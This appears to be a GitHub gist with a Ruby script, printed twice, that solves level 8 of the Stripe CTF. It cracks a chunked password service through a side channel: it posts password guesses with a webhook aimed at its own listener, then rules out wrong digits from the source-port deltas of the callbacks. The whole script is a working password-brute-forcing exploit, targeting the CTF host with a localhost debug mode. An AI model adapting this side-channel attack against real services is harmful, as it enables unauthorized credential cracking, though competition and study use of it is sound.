DouglasLivingstone/gist:3517847

## gistfile1.rb
require 'socket'
require 'thread'
require 'net/http'
require 'net/https'

puts "PID: #{$$}"

mode = :debug

if mode == :debug
  target_host = "localhost"
  target_port = 10000
  target_path = "/"
  webhook = "localhost:8000"
  use_ssl = false
else
  target_host = "level08-2.stripe-ctf.com"
  target_port = 443
  target_path = "/user-fqljfbmkxg/"
  webhook = "level02-2.stripe-ctf.com:8000"
  use_ssl = true
end

candidates = (0..999).to_a
pattern = "%03d000000000"
exclusion_delta = 2

server = TCPServer.new 8000

guess = nil
previous_port = 0

http = Net::HTTP.new(target_host, target_port)
http.use_ssl = use_ssl

begin

  unless http.active?
    puts http.start
    puts "active" if http.active?
  end

  # dummy request
  http.post target_path, "{\"password\":\"000\",\"webhooks\":[\"#{webhook}\"]}"
  client = server.accept
  previous_port = client.peeraddr[1]
  client.close

  candidates[0..-1].each do |candidate|
    guess = pattern % candidate
    http.post target_path, "{\"password\":\"#{guess}\",\"webhooks\":[\"#{webhook}\"]}"

    client = server.accept
    port = client.peeraddr[1]
    client.close

    delta = port - previous_port

    if delta == exclusion_delta
      puts "not #{candidate}"
      candidates.delete(candidate)
    else
      puts "delta #{delta} for #{candidate}"
    end

    previous_port = port
  end

  puts "Candidates:"
  puts candidates.join(", ")

  if candidates.length > 1
    raise "Not done yet..."
  end

rescue Exception => e
  puts e
  puts "Press any key to retry..."
  STDIN.getc
  retry

ensure
  http.finish
end

if candidates.length == 1
  puts "Got it: #{candidates.first}"
else
  puts "Hmm, not sure..."
  puts candidates.join(", ")
end
	require 'socket'
	require 'thread'
	require 'net/http'
	require 'net/https'

	puts "PID: #{$$}"

	mode = :debug

	if mode == :debug
	target_host = "localhost"
	target_port = 10000
	target_path = "/"
	webhook = "localhost:8000"
	use_ssl = false
	else
	target_host = "level08-2.stripe-ctf.com"
	target_port = 443
	target_path = "/user-fqljfbmkxg/"
	webhook = "level02-2.stripe-ctf.com:8000"
	use_ssl = true
	end

	candidates = (0..999).to_a
	pattern = "%03d000000000"
	exclusion_delta = 2

	server = TCPServer.new 8000

	guess = nil
	previous_port = 0

	http = Net::HTTP.new(target_host, target_port)
	http.use_ssl = use_ssl

	begin

	unless http.active?
	puts http.start
	puts "active" if http.active?
	end

	# dummy request
	http.post target_path, "{\"password\":\"000\",\"webhooks\":[\"#{webhook}\"]}"
	client = server.accept
	previous_port = client.peeraddr[1]
	client.close

	candidates[0..-1].each do \|candidate\|
	guess = pattern % candidate
	http.post target_path, "{\"password\":\"#{guess}\",\"webhooks\":[\"#{webhook}\"]}"

	client = server.accept
	port = client.peeraddr[1]
	client.close

	delta = port - previous_port

	if delta == exclusion_delta
	puts "not #{candidate}"
	candidates.delete(candidate)
	else
	puts "delta #{delta} for #{candidate}"
	end

	previous_port = port
	end

	puts "Candidates:"
	puts candidates.join(", ")

	if candidates.length > 1
	raise "Not done yet..."
	end

	rescue Exception => e
	puts e
	puts "Press any key to retry..."
	STDIN.getc
	retry

	ensure
	http.finish
	end

	if candidates.length == 1
	puts "Got it: #{candidates.first}"
	else
	puts "Hmm, not sure..."
	puts candidates.join(", ")
	end